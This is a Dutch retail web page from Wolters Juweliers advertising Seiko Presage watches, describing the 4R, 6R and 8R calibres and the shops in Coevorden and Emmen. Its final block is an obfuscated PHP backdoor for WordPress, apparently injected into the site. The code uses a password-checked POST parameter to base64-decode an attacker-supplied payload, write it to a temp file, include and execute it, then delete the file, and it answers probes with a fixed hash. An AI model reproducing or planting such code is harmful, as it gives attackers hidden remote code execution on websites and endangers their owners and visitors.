Seiko-presage-horloge kopen ruime keuze bij Wolters Juweliers

Seiko Presage herenhorloge bij Wolters Juweliers

Seiko Presage is een horloge collectie met een zeer brede uitstraling, waarbij het volledige scala aan Seiko's mechanische kalibers wordt ingezet. Van het toegankelijke 4R kaliber tot het exclusieve 8R kaliber.

Een bijzondere serie horloges. Alle modellen delen de subtiele design-elementen van het origineel. De sunray wijzerplaten hebben een diep reliëfpatroon, waarvan de glinsterende schoonheid wordt versterkt door een afwerking van zeven laklaagjes. De wijzers zijn op uiterst delicate wijze met de hand gebogen om de kast een slanker profiel te bezorgen. De verborgen kracht van het kaliber wordt pas tastbaar tijdens het draaien van de uniek gevormde kroon. De uitmuntende kwaliteit van Presage ontmoet de charme van een design dat is geïnspireerd op het genoegen van een perfecte cocktail. En zoals we in Japan zeggen: ‘Kampai!’

Seiko Presage horloge
Koop uw Seiko Presage herenhorloge bij Wolters Juweliers, kom langs in onze winkel in Coevorden of Emmen. Wij geven u graag advies over het juiste horloge. Of bezoek onze webshop om uw nieuwe Presage horloge te kopen.

Bekijk hieronder een greep uit onze collectie Seiko Presage horloges

Kaliber

SEIKO'S 4R KALIBER

Alle mechanische 4R kalibers van Seiko Presage zijn automatische horloges waarbij handopwinding ook mogelijk is. Het Presage 4R kaliber wordt in Japan gemaakt en wordt kwalitatief hoogwaardig afgewerkt met een fraaie goudkleurige rotor.

SEIKO'S 6R KALIBER

De mechanische 6R kalibers van Seiko Presage bieden een scala aan functies: van datumweergave tot een multi-hand horloge met energiereserve-indicator op de wijzerplaat. Elk Presage horloge dat voorzien is van het 6R kaliber is fraai afgewerkt met een kwalitatief streep-patroon dat op de rotor is gegraveerd. Dit luxe detail is duidelijk zichtbaar via het glazen achterdeksel. Alle 6R kalibers worden volledig in eigen huis gemaakt.

SEIKO'S 8R KALIBER

Het 8R kaliber is Seiko's meest prestigieuze automaat chronograafkaliber. Dit bijzondere uurwerk bestaat uit maar liefst 311 onderdelen, waaronder Seiko's Vertical Clutch en Column Wheel systemen die voor een zeer precieze stopwatchwerking en voor de hoge nauwkeurigheid en betrouwbaarheid van het horloge zorgen. Seiko´s unieke 3-punts hamer zorgt ervoor dat de 'terugvlucht' van de secondewijzer naar de 12 uur-positie perfect gesynchroniseerd verloopt met de andere wijzers en draagt bij aan de grote nauwkeurigheid. Het kaliber beschikt ook over een snelle datumaanpassing en is één van de meest verfijnde automaat chronografen ter wereld.

Seiko-Presage-kaliber-automatic-Wolters-Juweliers-Coevorden-Emmen
Seiko-Presage-horloge-kopen-bij-Wolters-Juweliers-Coevorden-Emmen-Hoogeveen-Hardenberg

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}